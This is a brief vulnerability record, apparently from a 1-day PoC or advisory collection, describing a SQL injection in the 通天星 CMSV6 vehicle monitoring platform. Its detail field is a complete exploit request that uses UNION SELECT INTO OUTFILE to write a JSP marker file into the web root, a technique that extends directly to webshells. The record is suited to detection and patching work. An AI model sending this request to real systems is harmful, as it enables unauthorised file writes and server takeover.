vendor = "通天星"
name = "通天星 CMSV6 车载定位监控平台 SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/run_stop/delete.do"
detail = "GET /run_stop/delete.do;downloadLogger.action?ids=1%29+union+select+0x3c25206f75742e7072696e746c6e282276756c22293b20253e+into+OUTFILE+%27..%2F.. %2Ftomcat%2Fwebapps%2Fgpsweb%2Fvuln.jsp%27+--+a&loadAll=1 HTTP/1.1Host: User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
